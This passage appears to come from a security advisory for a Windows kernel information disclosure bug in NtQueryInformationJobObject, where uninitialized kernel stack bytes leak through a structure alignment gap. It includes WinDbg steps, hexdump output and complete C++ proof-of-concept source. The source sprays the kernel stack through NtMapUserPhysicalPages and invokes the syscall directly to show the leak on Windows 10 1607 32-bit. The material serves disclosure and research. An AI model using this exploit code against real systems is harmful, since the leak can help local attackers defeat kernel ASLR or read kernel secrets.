Where 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode. The output data is returned in a JOBOBJECT_EXTENDED_LIMIT_INFORMATION structure [1]. If we map the above shadow bytes to the structure definition, it turns out that the uninitialized bytes correspond to the alignment hole between the end of the JOBOBJECT_BASIC_LIMIT_INFORMATION structure and the beginning of the adjacent IO_COUNTERS structure. The length of the former is 0x2C (44), while the latter must be 8-byte aligned, so there is a gap at offsets 0x2C-0x2F, which is not initialized by the kernel.
The vulnerability can be easily demonstrated with a kernel debugger (WinDbg), by setting a breakpoint on nt!NtQueryInformationJobObject, manually filling out the structure memory with a marker byte (0x41), and then observing four of these bytes printed out by the attached proof-of-concept program:
--- cut ---
2: kd> bp nt!NtQueryInformationJobObject
2: kd> g
Breakpoint 0 hit
nt!NtQueryInformationJobObject:
818d5891 6890010000 push 190h
3: kd> p
nt!NtQueryInformationJobObject+0x5:
818d5896 68e0cf6981 push offset nt! ?? ::FNODOBFM::`string'+0x6100 (8169cfe0)
3: kd> p
nt!NtQueryInformationJobObject+0xa:
818d589b e8b8dbdeff call nt!_SEH_prolog4 (816c3458)
3: kd> p
nt!NtQueryInformationJobObject+0xf:
818d58a0 33f6 xor esi,esi
3: kd> f ebp-18c ebp-18c+70-1 41
Filled 0x70 bytes
3: kd> g
--- cut ---
An example output on our test virtual machine is as follows:
--- cut ---
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 20 00 00 00 05 00 00 00 41 41 41 41 .... .......AAAA
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
--- cut ---
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
################################################################################
Upon further investigation of the bug, we have determined the following:
- Not only the JobObjectExtendedLimitInformation (9), but also the JobObjectBasicLimitInformation (2) information class is affected by the vulnerability. The issue is very similar in that it also leaks 4 uninitialized bytes of kernel stack at offset 0x2C of the output structure. Since both classes are handled by the same or very close code areas, we are treating both cases as the same bug.
- Windows 10 (contrary to Windows 7) allows the output buffer for JobObjectExtendedLimitInformation to optionally be 120-bytes long instead of the typical 112. In that case, extra 4 kernel stack bytes are leaked at the end of the structure.
- It is possible to demonstrate the bug without resorting to a kernel debugger, by using the nt!NtMapUserPhysicalPages system call to spray the kernel stack with a large number of controlled bytes, and then invoking the affected nt!NtQueryInformationJobObject syscall directly, instead of through the QueryInformationJobObject() API.
To address all of the above new facts, I'm attaching a new proof-of-concept program, specific to Windows 10 1607 32-bit, which demonstrates the memory disclosure in all three possible settings: JobObjectBasicLimitInformation (output length 48), JobObjectExtendedLimitInformation (output length 112) and JobObjectExtendedLimitInformation (output length 120). An example output of the program is shown below:
--- cut ---
JobObjectBasicLimitInformation:
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA
JobObjectExtendedLimitInformation (112):
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
JobObjectExtendedLimitInformation (120):
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000070: 00 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
--- cut ---
*/
#include <Windows.h>
#include <winternl.h>
#include <cstdio>
extern "C"
ULONG WINAPI NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
for (ULONG i = 0; i < size; i++) {
ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static BYTE buffer[4096];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
// Windows 10 1607 32-bit.
CONST ULONG __NR_NtQueryInformationJobObject = 0x00b9;
// Create a job object to operate on.
HANDLE hJob = CreateJobObject(NULL, NULL);
// Spray the kernel stack with a marker value, to get visible results.
SprayKernelStack();
// Trigger the bug in nt!NtQueryInformationJobObject(JobObjectBasicLimitInformation).
DWORD ReturnLength = 0;
BYTE output[120] = { /* zero padding */ };
NTSTATUS st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectBasicLimitInformation, &output, sizeof(JOBOBJECT_BASIC_LIMIT_INFORMATION), &ReturnLength);
if (!NT_SUCCESS(st)) {
printf("NtQueryInformationJobObject#1 failed, %x\n", st);
CloseHandle(hJob);
return 1;
}
// Print out the output.
printf("JobObjectBasicLimitInformation:\n");
PrintHex(output, ReturnLength);
// Spray the kernel again before invoking the affected system call.
SprayKernelStack();
// Trigger the bug in nt!NtQueryInformationJobObject(JobObjectExtendedLimitInformation), buffer size 112.
ZeroMemory(output, sizeof(output));
st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectExtendedLimitInformation, output, 112, &ReturnLength);
if (!NT_SUCCESS(st)) {
printf("NtQueryInformationJobObject#2 failed, %x\n", st);
CloseHandle(hJob);
return 1;
}
// Print the output again.
printf("JobObjectExtendedLimitInformation (112):\n");
PrintHex(output, ReturnLength);
// Spray the kernel again before invoking the affected system call.
SprayKernelStack();
// Trigger the bug in nt!NtQueryInformationJobObject(JobObjectExtendedLimitInformation), buffer size 120.
ZeroMemory(output, sizeof(output));
st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectExtendedLimitInformation, output, 120, &ReturnLength);
if (!NT_SUCCESS(st)) {
printf("NtQueryInformationJobObject#2 failed, %x\n", st);
CloseHandle(hJob);
return 1;
}
// Print the output again.
printf("JobObjectExtendedLimitInformation (120):\n");
PrintHex(output, ReturnLength);
// Free resources.
CloseHandle(hJob);
return 0;
}